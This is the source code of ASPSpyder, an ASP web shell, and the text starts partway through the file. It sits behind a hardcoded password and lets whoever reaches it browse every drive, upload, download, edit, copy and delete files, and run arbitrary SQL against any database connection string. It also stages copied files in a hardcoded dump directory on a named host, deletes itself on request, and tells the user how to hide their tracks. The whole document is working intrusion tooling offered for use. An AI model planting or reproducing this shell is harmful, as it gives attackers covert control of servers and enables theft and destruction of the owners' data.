nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))
oUploadFile.ContentType = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
nPosBegin = nPosEnd+4
nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
oUploadFile.FileData = MidB(biData, nPosBegin, nPosEnd-nPosBegin)
If oUploadFile.FileSize > 0 Then Files.Add LCase(sInputName), oUploadFile
Else
nPos = InstrB(nPos, biData, CByteString(Chr(13)))
nPosBegin = nPos + 4
nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
If Not mcolFormElem.Exists(LCase(sInputName)) Then mcolFormElem.Add LCase(sInputName), CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
End If
nDataBoundPos = InstrB(nDataBoundPos + LenB(vDataBounds), biData, vDataBounds)
Loop
End Sub
'String to byte string conversion
Private Function CByteString(sString)
Dim nIndex
For nIndex = 1 to Len(sString)
CByteString = CByteString & ChrB(AscB(Mid(sString,nIndex,1)))
Next
End Function
'Byte string to string conversion
Private Function CWideString(bsString)
Dim nIndex
CWideString =""
For nIndex = 1 to LenB(bsString)
CWideString = CWideString & Chr(AscB(MidB(bsString,nIndex,1)))
Next
End Function
End Class
Class UploadedFile
Public ContentType
Public FileName
Public FileData
Public Property Get FileSize()
FileSize = LenB(FileData)
End Property
Public Sub SaveToDisk(sPath)
Dim oFS, oFile
Dim nIndex
If sPath = "" Or FileName = "" Then Exit Sub
If Mid(sPath, Len(sPath)) <> "\" Then sPath = sPath & "\"
Set oFS = Server.CreateObject("Scripting.FileSystemObject")
If Not oFS.FolderExists(sPath) Then Exit Sub
Set oFile = oFS.CreateTextFile(sPath & FileName, True)
' output mechanism modified for buffering
oFile.Write BufferContent(FileData)
oFile.Close
End Sub
Public Sub SaveToDatabase(ByRef oField)
If LenB(FileData) = 0 Then Exit Sub
If IsObject(oField) Then
oField.AppendChunk FileData
End If
End Sub
End Class
' Create the FileUploader
IF REQUEST.QueryString("upload")="@" THEN
Dim Uploader, File
Set Uploader = New FileUploader
' This starts the upload process
Uploader.Upload()
%>
<html><title>ASPYDrvsInfo</title>
<style>
<!--
A:link {font-style: text-decoration: none; color: #c8c8c8}
A:visited {font-style: text-decoration: none; color: #777777}
A:active {font-style: text-decoration: none; color: #ff8300}
A:hover {font-style: text-decoration: cursor: hand; color: #ff8300}
* {scrollbar-base-color:#777777;
scrollbar-track-color:#777777;scrollbar-darkshadow-color:#777777;scrollbar-face-color:#505050;
scrollbar-arrow-color:#ff8300;scrollbar-shadow-color:#303030;scrollbar-highlight-color:#303030;}
input,select,table {font-family:verdana,arial;font-size:11px;text-decoration:none;border:1px solid #000000;}
//-->
</style>
<body bgcolor=black text=white>
<BR><BR><BR>
<center><table bgcolor="#505050" cellpadding=4>
<tr><td><Font face=arial size=-1>File upload Information:</font>
</td></tr><tr><td bgcolor=black ><table>
<%
' Check if any files were uploaded
If Uploader.Files.Count = 0 Then
Response.Write "File(s) not uploaded."
Else
' Loop through the uploaded files
For Each File In Uploader.Files.Items
File.SaveToDisk Request.QueryString("txtpath")
Response.Write "<TR><TD>&nbsp;</TD></TR><tr><td><font color=gray>File Uploaded: </font></td><td>" & File.FileName & "</td></tr>"
Response.Write "<tr><td><font color=gray>Size: </font></td><td>" & Int(File.FileSize/1024)+1 & " kb</td></tr>"
Response.Write "<tr><td><font color=gray>Type: </font></td><td>" & File.ContentType & "</td></tr>"
Next
End If
%>
<TR><TD>&nbsp;</TD></TR></table>
</td></tr></table><BR><a href="<%=Request.Servervariables("SCRIPT_NAME")%>?txtpath=<%=Request.QueryString("txtpath")%>"><font face="webdings" title=" BACK " size=+2 >7</font></a></center>
<%
response.End() '---- XXX
END IF
'--------
ON ERROR RESUME NEXT
Response.Buffer = True
password = "t00ls.org" ' <---Your password here
If request.querystring("logoff")="@" then
session("shagman")="" ' Logged off
session("dbcon")="" ' Database Connection
session("txtpath")="" ' any pathinfo
end if
If (session("shagman")<>password) and Request.form("code")="" Then
%>
<body bgcolor=black><center><BR><BR><BR><BR><FONT face=arial size=-2 color=#ff8300>ADMINSTRATORS TOOLKIT</FONT><BR><BR><BR>
<table><tr><td>
<FORM method="post" action="<%=Request.Servervariables("SCRIPT_NAME")%>" >
<table bgcolor=#505050 width="20%" cellpadding=20 ><tr><td bgcolor=#303030 align=center >
<INPUT type=password name=code ></td><td><INPUT name=submit type=submit value=" Access ">
</td></tr></table>
</td></tr><tr><td align=right>
<font color=white size=-2 face=arial >ASPSpyder Apr2003</font></td></tr>
</td></tr></table></FORM>
<%If request.querystring("logoff")="@" then%>
<font color=gray size=-2 face=arial title="To avoid anyone from seeing what you were doing by using the browser back button."><span style='cursor: hand;' OnClick=window.close(this);>CLOSE THIS WINDOW</font>
<%end if%>
<center>
<%
Response.END
End If
If Request.form("code") = password or session("shagman") = password Then
session("shagman") = password
Else
Response.Write "<BR><B><P align=center><font color=red ><b>ACCESS DENIED</B></font><BR><font color=Gray >Copyright 2003 Vela iNC.</font></p>"
Response.END
End If
server.scriptTimeout=180
set fso = Server.CreateObject("Scripting.FileSystemObject")
mapPath = Server.mappath(Request.Servervariables("SCRIPT_NAME"))
mapPathLen = len(mapPath)
if session(myScriptName) = "" then
for x = mapPathLen to 0 step -1
myScriptName = mid(mapPath,x)
if instr(1,myScriptName,"\")>0 then
myScriptName = mid(mapPath,x+1)
x=0
session(myScriptName) = myScriptName
end if
next
Else
myScriptName = session(myScriptName)
end if
wwwRoot = left(mapPath, mapPathLen - len(myScriptName))
Target = "D:\hshome\masterhr\masterhr.com\" ' ---Directory to which files will be DUMPED Too and From
if len(Request.querystring("txtpath"))=3 then
pathname = left(Request.querystring("txtpath"),2) & "\" & Request.form("Fname")
else
pathname = Request.querystring("txtpath") & "\" & Request.form("Fname")
end if
If Request.Form("txtpath") = "" Then
MyPath = Request.QueryString("txtpath")
Else
MyPath = Request.Form("txtpath")
End If
' ---Path correction routine
If len(MyPath)=1 then MyPath=MyPath & ":\"
If len(MyPath)=2 then MyPath=MyPath & "\"
If MyPath = "" Then MyPath = wwwRoot
If not fso.FolderExists(MyPath) then
Response.Write "<font face=arial size=+2>Non-existing path specified.<BR>Please use browser back button to continue !"
Response.end
end if
set folder = fso.GetFolder(MyPath)
if fso.GetFolder(Target) = false then
Response.Write "<font face=arial size=-2 color=red>Please create your target directory for copying files as it does not exist. </font><font face=arial size=-1 color=red>" & Target & "<BR></font>"
else
set fileCopy = fso.GetFolder(Target)
end if
If Not(folder.IsRootFolder) Then
If len(folder.ParentFolder)>3 then
showPath = folder.ParentFolder & "\" & folder.name
Else
showPath = folder.ParentFolder & folder.name
End If
Else
showPath = left(MyPath,2)
End If
MyPath=showPath
showPath=MyPath & "\"
' ---Path correction routine-DONE
set drv=fso.GetDrive(left(MyPath,2))
if Request.Form("cmd")="Download" then
if Request.Form("Fname")<>"" then
Response.Buffer = True
Response.Clear
strFileName = Request.QueryString("txtpath") & "\" & Request.Form("Fname")
Set Sys = Server.CreateObject( "Scripting.FileSystemObject" )
Set Bin = Sys.OpenTextFile( strFileName, 1, False )
Call Response.AddHeader( "Content-Disposition", "attachment; filename=" & Request.Form("Fname") )
Response.ContentType = "application/octet-stream"
While Not Bin.AtEndOfStream
Response.BinaryWrite( ChrB( Asc( Bin.Read( 1 ) ) ) )
Wend
Bin.Close : Set Bin = Nothing
Set Sys = Nothing
Else
err.number=500
err.description="Nothing selected for download..."
End if
End if
%>
<html>
<style>
<!--
A:link {font-style: text-decoration: none; color: #c8c8c8}
A:visited {font-style: text-decoration: none; color: #777777}
A:active {font-style: text-decoration: none; color: #ff8300}
A:hover {font-style: text-decoration: cursor: hand; color: #ff8300}
* {scrollbar-base-color:#777777;
scrollbar-track-color:#777777;scrollbar-darkshadow-color:#777777;scrollbar-face-color:#505050;
scrollbar-arrow-color:#ff8300;scrollbar-shadow-color:#303030;scrollbar-highlight-color:#303030;}
input,select,table {font-family:verdana,arial;font-size:11px;text-decoration:none;border:1px solid #000000;}
//-->
</style>
<%
'QUERY ANALYSER -- START
if request.QueryString("qa")="@" then
'-------------
sub getTable(mySQL)
if mySQL="" then
exit sub
end if
on error resume next
Response.Buffer = True
Dim myDBConnection, rs, myHtml,myConnectionString, myFields,myTitle,myFlag
myConnectionString=session("dbCon")
Set myDBConnection = Server.CreateObject("ADODB.Connection")
myDBConnection.Open myConnectionString
myFlag = False
myFlag = errChk()
set rs = Server.CreateObject("ADODB.Recordset")
rs.cursorlocation = 3
rs.open mySQL, myDBConnection
myFlag = errChk()
if RS.properties("Asynchronous Rowset Processing") = 16 then
For i = 0 To rs.Fields.Count - 1
myFields = myFields & "<TD><font color=#eeeeee size=2 face=""Verdana, Arial, Helvetica, sans-serif"">" & rs.Fields(i).Name & "</font></TD>"
Next
myTitle = "<font color=gray size=6 face=webdings>?</font><font color=#ff8300 size=2 face=""Verdana, Arial, Helvetica, sans-serif"">Query results :</font>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<font color=gray><TT>(" & rs.RecordCount & " row(s) affected)</TT><br>"
rs.MoveFirst
rs.PageSize=mNR
if int(rs.RecordCount/mNR) < mPage then mPage=1
rs.AbsolutePage = mPage
Response.Write myTitle & "</td><td>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;"
if mPage=1 Then Response.Write("<input type=button name=btnPagePrev value="" << "" DISABLED>") else Response.Write("<input type=button name=btnPagePrev value="" << "">")
Response.Write "<select name=cmbPageSelect>"
For x = 1 to rs.PageCount
if x=mPage Then Response.Write("<option value=" & x & " SELECTED>" & x & "</option>") else Response.Write("<option value=" & x & ">" & x & "</option>")
Next
Response.Write "</select><input type=hidden name=mPage value=" & mPage & ">"
if mPage = rs.PageCount Then Response.Write("<input type=button name=btnPageNext value="" >> "" DISABLED>") else Response.Write("<input type=button name=btnPageNext value="" >> "">")
Response.Write "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<font color=gray>Displaying <input type=text size=" & Len(mNR) & " name=txtNoRecords value=" & mNR & "> records at a time.</font>"
response.Write "</td><TABLE border=0 bgcolor=#999999 cellpadding=2><TR align=center valign=middle bgcolor=#777777>" & myFields
For x = 1 to rs.PageSize
If Not rs.EOF Then
response.Write "<TR>"
For i = 0 to rs.Fields.Count - 1
response.Write "<TD bgcolor=#dddddd>" & server.HTMLEncode(rs(i)) & "</TD>"
Next
response.Write "</TR>"
response.Flush()
rs.MoveNext
Else
x=rs.PageSize
End If
Next
response.Write "</Table>"
myFlag = errChk()
else
if not myFlag then
myTitle = "<font color=#55ff55 size=6 face=webdings>i</font><font color=#ff8300 size=2 face=""Verdana, Arial, Helvetica, sans-serif"">Query results :</font>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<font color=gray><TT>(The command(s) completed successfully.)</TT><br>"
response.Write myTitle
end if
end if
set myDBConnection = nothing
set rs2 = nothing
set rs = nothing
End sub
sub getXML(mySQL)
if mySQL="" then
exit sub
end if
on error resume next
Response.Buffer = True
Dim myDBConnection, rs, myHtml,myConnectionString, myFields,myTitle,myFlag
myConnectionString=session("dbCon")
Set myDBConnection = Server.CreateObject("ADODB.Connection")
myDBConnection.Open myConnectionString
myFlag = False
myFlag = errChk()
set rs = Server.CreateObject("ADODB.Recordset")
rs.cursorlocation = 3
rs.open mySQL, myDBConnection
myFlag = errChk()
if RS.properties("Asynchronous Rowset Processing") = 16 then
Response.Write "<font color=#55ff55 size=4 face=webdings>i</font><font color=#cccccc> Copy paste this code and save as '.xml '</font></td></tr><tr><td>"
Response.Write "<textarea cols=75 name=txtXML rows=15>"
rs.MoveFirst
response.Write vbcrlf & "<?xml version=""1.0"" ?>"
response.Write vbcrlf & "<TableXML>"
Do While Not rs.EOF
response.Write vbcrlf & "<Column>"
For i = 0 to rs.Fields.Count - 1
response.Write vbcrlf & "<" & rs.Fields(i).Name & ">" & rs(i) & "</" & rs.Fields(i).Name & ">" & vbcrlf
response.Flush()
Next
response.Write "</Column>"
rs.MoveNext
Loop
response.Write "</TableXML>"
response.Write "</textarea>"
myFlag = errChk()
else
if not myFlag then
myTitle = "<font color=#55ff55 size=6 face=webdings>i</font><font color=#ff8300 size=2 face=""Verdana, Arial, Helvetica, sans-serif"">Query results :</font>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<font color=gray><TT>(The command(s) completed successfully.)</TT><br>"
response.Write myTitle
end if
end if
End sub
Function errChk()
if err.Number <> 0 and err.Number <> 13 then
dim myText
myText = "<font color=#ff8300 size=4 face=webdings>x</font><font color=red size=2 face=""Verdana, Arial, Helvetica, sans-serif""> " & err.Description & "</font><BR>"
response.Write myText
err.Number = 0
errChk = True
end if
end Function
Dim myQuery,mPage,mNR
myQuery = request.Form("txtSQL")
if request.form("txtCon") <> "" then session("dbcon") = request.form("txtCon")
if request.QueryString("txtpath") then session("txtpath")=request.QueryString("txtpath")
mPage=cint(request.Form("mPage"))
if mPage<1 then mPage=1
mNR=cint(request.Form("txtNoRecords"))
if mNR<1 then mNR=30
%>
<html><title>ASPyQAnalyser</title>
<script language="VbScript">
sub cmdSubmit_onclick
if Document.frmSQL.txtSQL.value = "" then
Document.frmSQL.txtSQL.value = "SELECT * FROM " & vbcrlf & "WHERE " & vbcrlf & "ORDER BY "
exit sub
end if
Document.frmSQL.Submit
end sub
sub cmdTables_onclick
Document.frmSQL.txtSQL.value = "select name as 'TablesListed' from sysobjects where xtype='U' order by name"
Document.frmSQL.Submit
end sub
sub cmdColumns_onclick
strTable =InputBox("Return Columns for which Table?","Table Name...")
strTable = Trim(strTable)
if len(strTable) > 0 Then
SQL = "select name As 'ColumnName',xusertype As 'DataType',length as Length from syscolumns where id=(select id from sysobjects where xtype='U' and name='" & strTable & "') order by name"
Document.frmSQL.txtSQL.value = SQL
Document.frmSQL.Submit
End if
end sub
sub cmdClear_onclick
Document.frmSQL.txtSQL.value = ""
end sub
sub cmdBack_onclick
Document.Location = "<%=Request.Servervariables("SCRIPT_NAME")%>?txtpath=<%=session("txtpath")%>"
end sub
Sub btnPagePrev_OnClick
Document.frmSQL.mPage.value = Document.frmSQL.mPage.value - 1
Document.frmSQL.Submit
end sub
Sub btnPageNext_OnClick
Document.frmSQL.mPage.value = Document.frmSQL.mPage.value + 1
Document.frmSQL.Submit
end sub
Sub cmbPageSelect_onchange
Document.frmSQL.mPage.value = (Document.frmSQL.cmbPageSelect.selectedIndex + 1)
Document.frmSQL.Submit
End Sub
Sub txtNoRecords_onclick
Document.frmSQL.cmbPageSelect.selectedIndex = 0
Document.frmSQL.mPage.value = 1
End Sub
</script>
<style>
TR {font-family: sans-serif;}
</style>
<body bgcolor=black>
<form name=frmSQL action="<%=Request.Servervariables("SCRIPT_NAME")%>?qa=@" method=Post>
<table border="0"><tr>
<td align=right><font color=#ff8300 size="4" face="webdings">@ </font><font color="#CCCCCC" size="1" face="Verdana, Arial, Helvetica, sans-serif">Paste
your connection string here : </font><font color="#CCCCCC">
<input name=txtCon type="text" size="60" value="<%=session("dbcon")%>">
</font><BR>
<textarea cols=75 name=txtSQL rows=4 wrap=PHYSICAL><%=myQuery%></textarea><BR>
<input name=cmdSubmit type=button value=Submit><input name=cmdTables type=button value=Tables><input name=cmdColumns type=button value=Columns><input name="reset" type=reset value=Reset><input name=cmdClear type=button value=Clear><input name=cmdBack type=button value="Return"><input type="Checkbox" name="chkXML" <%IF Request.Form("chkXML")= "on" tHEN Response.Write " checked " %>><font color="#CCCCCC" size="1" face="Verdana, Arial, Helvetica, sans-serif">GenerateXML</FONT>
</td>
<td>XXXXXX</td><td>
<center><B>ASP</b><font color=#ff8300 face=webdings size=6 >!</font><B><font color=Gray >Spyder</font> Apr2003</B><BR><font color=black size=-2><TT>by ~sir_shagalot</TT></font></center>
</td></tr></table>
<table><tr><td><%If Request.Form("chkXML") = "on" Then getXML(myQuery) Else getTable(myQuery) %></td></tr></table></form>
<HR><P align=right><font color=#ff8300><TT>Copyright 2003 Vela iNC.</B></font><BR><font size=-1 color=gray>Cheers to <a href="mailto:hAshish@shagzzz.cjb.net">hAshish</a> for all the help!</font></p><BR>
</body>
</html>
<%
set myDBConnection = nothing
set rs2 = nothing
set rs = nothing
'-------------
response.End()
end if
'QUERY ANALYSER -- STOP
%>
<title><%=MyPath%></title>
</head>
<body bgcolor=black text=white topAprgin="0">
<!-- Copyright Vela iNC. Apr2003 [www.shagzzz.cjb.net] Coded by ~sir_shagalot -->
<%
Response.Flush
'Code Optimisation START
select case request.form("cmd")
case ""
If request.form("dirStuff")<>"" then
Response.write "<font face=arial size=-2>You need to click [Create] or [Delete] for folder operations to be</font>"
Else
Response.Write "<font face=webdings size=+3 color=#ff8300>&#1570;</font>"
End If
case " Copy "
' ---Copy From Folder routine Start
If Request.Form("Fname")="" then
Response.Write "<font face=arial size=-2 color=#ff8300>Copying: " & Request.QueryString("txtpath") & "\???</font><BR>"
err.number=424
Else
Response.Write "<font face=arial size=-2 color=#ff8300>Copying: " & Request.QueryString("txtpath") & "\" & Request.Form("Fname") & "</font><BR>"
fso.CopyFile Request.QueryString("txtpath") & "\" & Request.Form("Fname"),Target & Request.Form("Fname")
Response.Flush
End If
' ---Copy From Folder routine Stop
case " Copy "
' ---Copy Too Folder routine Start
If Request.Form("ToCopy")<>"" and Request.Form("ToCopy") <> "------------------------------" Then
Response.Write "<font face=arial size=-2 color=#ff8300>Copying: " & Request.Form("txtpath") & "\" & Request.Form("ToCopy") & "</font><BR>"
Response.Flush
fso.CopyFile Target & Request.Form("ToCopy"), Request.Form("txtpath") & "\" & Request.Form("ToCopy")
Else
Response.Write "<font face=arial size=-2 color=#ff8300>Copying: " & Request.Form("txtpath") & "\???</font><BR>"
err.number=424
End If
' ---Copy Too Folder routine Stop
case "Delete" 'two of this
if request.form("todelete")<>"" then
' ---File Delete start
If (Request.Form("ToDelete")) = myScriptName then'(Right(Request.Servervariables("SCRIPT_NAME"),len(Request.Servervariables("SCRIPT_NAME"))-1)) Then
Response.Write "<center><font face=arial size=-2 color=#ff8300><BR><BR><HR>SELFDESTRUCT INITIATED...<BR>"
Response.Flush
fso.DeleteFile Request.Form("txtpath") & "\" & Request.Form("ToDelete")
%>+++DONE+++</font><BR><HR>
<font color=gray size=-2 face=arial title="To avoid anyone from seeing what you were doing by using the browser back button."><span style='cursor: hand;' OnClick=window.close(this);>CLOSE THIS WINDOW</font>
<%Response.End
End If
If Request.Form("ToDelete") <> "" and Request.Form("ToDelete") <> "------------------------------" Then
Response.Write "<font face=arial size=-2 color=#ff8300>Deleting: " & Request.Form("txtpath") & "\" & Request.Form("ToDelete") & "</font><BR>"
Response.Flush
fso.DeleteFile Request.Form("txtpath") & "\" & Request.Form("ToDelete")
Else
Response.Write "<font face=arial size=-2 color=#ff8300>Deleting: " & Request.Form("txtpath") & "\???</font><BR>"
err.number=424
End If
' ---File Delete stop
Else If request.form("dirStuff")<>"" then
Response.Write "<font face=arial size=-2 color=#ff8300>Deleting folder...</font><BR>"
fso.DeleteFolder MyPath & "\" & request.form("DirName")
end if
End If
case "Edit/Create"
%>
<center><BR><table bgcolor="#505050" cellpadding="8"><tr>
<td bgcolor="#000000" valign="bottom">
<Font face=arial SIZE=-2 color=#ff8300>NOTE: The following edit box maynot display special characters from files. Therefore the contents displayed maynot be considered correct or accurate.</font>
</td></tr><tr><td><TT>Path=> <%=pathname%><BR><BR>
<%
' fetch file information
Set f = fso.GetFile(pathname)
%>
file Type: <%=f.Type%><BR>
file Size: <%=FormatNumber(f.size,0)%> bytes<BR>
file Created: <%=FormatDateTime(f.datecreated,1)%>&nbsp;<%=FormatDateTime(f.datecreated,3)%><BR>
last Modified: <%=FormatDateTime(f.datelastmodified,1)%>&nbsp;<%=FormatDateTime(f.datelastmodified,3)%><BR>
last Accessed: <%=FormatDateTime(f.datelastaccessed,1)%>&nbsp;<%=FormatDateTime(f.datelastaccessed,3)%><BR>
file Attributes: <%=f.attributes%><BR>
<%
Set f = Nothing
response.write "<center><FORM action=""" & Request.Servervariables("SCRIPT_NAME") & "?txtpath=" & MyPath & """ METHOD=""POST"">"
'read the file
Set f = fso.OpenTextFile(pathname)
If NOT f.AtEndOfStream Then fstr = f.readall
f.Close
Set f = Nothing
Set fso = Nothing
response.write "<TABLE><TR><TD>" & VBCRLF
response.write "<FONT TITLE=""Use this text area to view or change the contents of this document. Click [Save As] to store the updated contents to the web server."" FACE=arial SIZE=1 ><B>DOCUMENT CONTENTS</B></FONT><BR>" & VBCRLF
response.write "<TEXTAREA NAME=FILEDATA ROWS=16 COLS=85 WRAP=OFF>" & Server.HTMLEncode(fstr) & "</TEXTAREA>" & VBCRLF
response.write "</TD></TR></TABLE>" & VBCRLF
%>
<BR><center><TT>LOCATION <INPUT TYPE="TEXT" SIZE=48 MAXLENGTH=255 NAME="PATHNAME" VALUE="<%=pathname%>">
<INPUT TYPE="SUBMIT" NAME=cmd VALUE="Save As" TITLE="This write to the file specifed and overwrite it without warning.">
<INPUT TYPE="SUBMIT" NAME="POSTACTION" VALUE="Cancel" TITLE="If you recieve an error while saving, then most likely you do not have write access OR the file attributes are set to readonly !!">
</FORM></td></tr></table><BR>
<%
response.end
case "Create"
Response.Write "<font face=arial size=-2 color=#ff8300>Creating folder...</font><BR>"
fso.CreateFolder MyPath & "\" & request.form("DirName")
case "Save As"
Response.Write "<font face=arial size=-2 color=#ff8300>Saving file...</font><BR>"
Set f = fso.CreateTextFile(Request.Form("pathname"))
f.write Request.Form("FILEDATA")
f.close
end select
'Code Optimisation STOP
' ---DRIVES start here
If request.querystring("getDRVs")="@" then
%>
<BR><BR><BR><center><table bgcolor="#505050" cellpadding=4>
<tr><td><Font face=arial size=-1>Available Drive Information:</font>
</td></tr><tr><td bgcolor=black >
<table><tr><td><tt>Drive</td><td><tt>Type</td><td><tt>Path</td><td><tt>ShareName</td><td><tt>Size[MB]</td><td><tt>ReadyToUse</td><td><tt>VolumeLabel</td><td></tr>
<%For Each thingy in fso.Drives%>
<tr><td><tt>
<%=thingy.DriveLetter%> </td><td><tt> <%=thingy.DriveType%> </td><td><tt> <%=thingy.Path%> </td><td><tt> <%=thingy.ShareName%> </td><td><tt> <%=((thingy.TotalSize)/1024000)%> </td><td><tt> <%=thingy.IsReady%> </td><td><tt> <%=thingy.VolumeName%>
<%Next%>
</td></tr></table>
</td></tr></table><BR><a href="<%=Request.Servervariables("SCRIPT_NAME")%>?txtpath=<%=MyPath%>"><font face="webdings" title=" BACK " size=+2 >7</font></a></center>
<%
Response.end
end if
' ---DRIVES stop here
%>
<HEAD>
<SCRIPT Language="VBScript">
sub getit(thestuff)
if right("<%=showPath%>",1) <> "\" Then
document.myform.txtpath.value = "<%=showPath%>" & "\" & thestuff
Else
document.myform.txtpath.value = "<%=showPath%>" & thestuff
End If
document.myform.submit()
End sub
</SCRIPT>
</HEAD>
<%
'---Report errors
select case err.number
case "0"
response.write "<font face=webdings color=#55ff55>i</font> <font face=arial size=-2>Successfull..</font>"
case "58"
response.write "<font face=arial size=-1 color=red>Folder already exists OR no folder name specified...</font>"
case "70"
response.write "<font face=arial size=-1 color=red>Permission Denied, folder/file is readonly or contains such files...</font>"
case "76"
response.write "<font face=arial size=-1 color=red>Path not found...</font>"
case "424"
response.write "<font face=arial size=-1 color=red>Missing, Insufficient data OR file is readonly...</font>"
case else
response.write "<font face=arial size=-1 color=red>" & err.description & "</font>"
end select
'---Report errors end
%>
<center><B>ASP</b><font color=#ff8300 face=webdings size=6 >!</font><B><font color=Gray >Spyder</font> Apr2003</B><BR><font color=black size=-2><TT>by ~sir_shagalot</TT></font></center>
<font face=Courier>
<table><tr><td>
<form method="post" action="<%=Request.Servervariables("SCRIPT_NAME")%>" name="myform" >
<Table bgcolor=#505050 ><tr><td bgcolor=#505050 >
<font face=Arial size=-2 color=#ff8300 > PATH INFO : </font></td><td align=right ><font face=Arial size=-2 color=#ff8300 >Volume Label:</font> <%=drv.VolumeName%> </td></tr>
<tr><td colspan=2 cellpadding=2 bgcolor=#303030 ><font face=Arial size=-1 color=gray>Virtual: http://<%=Request.ServerVariables("SERVER_NAME")%><%=Request.Servervariables("SCRIPT_NAME")%></Font><BR><font face=wingdings color=Gray >1</font><font face=Arial size=+1 > <%=showPath%></Font>
<BR><input type=text width=40 size=60 name=txtpath value="<%=showPath%>" ><input type=submit name=cmd value=" View " >
</td></tr></form></table>
</td><td><center>
<table bgcolor=#505050 cellpadding=4><tr><td bgcolor=black ><a href="<%=Request.Servervariables("SCRIPT_NAME")%>?getDRVs=@&txtpath=<%=MyPath%>"><font size=-2 face=arial>Retrieve Available Network Drives</a></td></tr>
<tr><td bgcolor=black align=right><A HREF="<%=Request.Servervariables("SCRIPT_NAME")%>?qa=@&txtpath=<%=MyPath%>"><font size=-2 face=arial>SQL Query Analyser</A></td></tr>
<tr><td bgcolor=black align=right><A HREF="<%=Request.Servervariables("SCRIPT_NAME")%>?logoff=@&...thankyou.for.using.ASpyder....~sir_shagalot!..[shagzzz.cjb.net]"><font size=-2 face=arial>+++LOGOFF+++</A></td></tr></table>
</td></tr></table>
<p align=center ><Table width=75% bgcolor=#505050 cellpadding=4 ><tr><td>
<form method="post" action="<%=Request.Servervariables("SCRIPT_NAME")%>" ><font face=arial size=-1 >Delete file from current directory:</font><BR>
<select size=1 name=ToDelete >
<option>------------------------------</option>"
<%
fi=0
For each file in folder.Files
Response.Write "<option>" & file.name & "</option>"
fi=fi+1
next
Response.Write "</select><input type=hidden name=txtpath value=""" & MyPath & """><input type=Submit name=cmd value=Delete ></form></td><td>"
Response.Write "<form method=post name=frmCopyFile action=""" & Request.Servervariables("SCRIPT_NAME") & """ ><font face=arial size=-1 >Copy file too current directory:</font><br><select size=1 name=ToCopy >"
Response.Write "<option>------------------------------</option>"
For each file in fileCopy.Files
Response.Write "<option>" & file.name & "</option>"
next
Response.Write "</select><input type=hidden name=txtpath value=""" & MyPath & """><input type=Submit name=cmd value="" Copy "" ></form></td></tr></Table>"
Response.Flush
' ---View Tree Begins Here
Response.Write "<table Cellpading=2 width=75% bgcolor=#505050 ><tr><td valign=top width=50% bgcolor=#303030 >Folders:<BR><BR>"
fo=0
Response.Write "<font face=wingdings color=Gray >0</font> <FONT COLOR=#c8c8c8><span style='cursor: hand;' OnClick=""getit('..')"">..</span></FONT><BR>"
For each fold in folder.SubFolders '-->FOLDERz
fo=fo+1
Response.Write "<font face=wingdings color=Gray >0</font> <FONT COLOR=#eeeeee><span style='cursor: hand;' OnClick=""getit('" & fold.name & "')"">" & fold.name & "</span></FONT><BR>"
Next
%>
<BR><center><form method=post action="<%=Request.Servervariables("SCRIPT_NAME")%>?txtpath=<%=MyPath%>">
<table bgcolor=#505050 cellspacing=4><tr><td>
<font face=arial size=-1 title="Create and Delete folders by entering their names here manually.">Directory:</td></tr>
<tr><td align=right ><input type=text size=20 name=DirName><BR>
<input type=submit name=cmd value=Create><input type=submit name=cmd value=Delete><input type=hidden name=DirStuff value=@>
</tr></td></table></form>
<%
Response.Write "<BR></td><td valign=top width=50% bgcolor=#303030 >Files:<BR><BR>"
Response.Flush
%>
<form method=post name=frmCopySelected action="<%=Request.Servervariables("SCRIPT_NAME")%>?txtpath=<%=MyPath%>">
<%
Response.write "<center><select name=Fname size=" & fi+3 & " style=""background-color: rgb(48,48,48); color: rgb(210,210,210)"">"
For each file in folder.Files '-->FILEz
Response.Write "<option value=""" & file.name & """>&nbsp;&nbsp;" & file.name & " -- [" & Int(file.size/1024)+1 & " kb]</option>"
Next
Response.write "</select>"
Response.write "<br><input type=submit name=cmd value="" Copy ""><input type=submit name=cmd value=""Edit/Create""><input type=submit name=cmd value=Download>"
%>
</form>
<%
Response.Write "<BR></td></tr><tr><td align=center ><B>Listed: " & fo & "</b></td><td align=center ><b>Listed: " & fi & "</b></td></tr></table><BR>"
' ---View Tree Ends Here
' ---Upload Routine starts here
%>
<form method="post" ENCTYPE="multipart/form-data" action="<%=Request.Servervariables("SCRIPT_NAME")%>?upload=@&txtpath=<%=MyPath%>">
<table bgcolor="#505050" cellpadding="8">
<tr>
<td bgcolor=#303030 valign="bottom"><font size=+1 face=wingdings color=Gray >2</font><font face="Arial" size=-2 color="#ff8300"> SELECT FILES TO UPLOAD:<br>
<input TYPE="FILE" SIZE="53" NAME="FILE1"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE2"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE3"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE4"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE5"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE6"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE7"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE8"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE9"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE10"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE11"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE12"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE13"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE14"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE15"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE16"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE17"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE18"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE19"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE20"><BR>
&nbsp;&nbsp;<input TYPE="submit" VALUE="Upload !" name="Upload" TITLE="If you recieve an error while uploading, then most likely you do not have write access to disk !!">
</font></td>
</tr>
</table>
<BR>
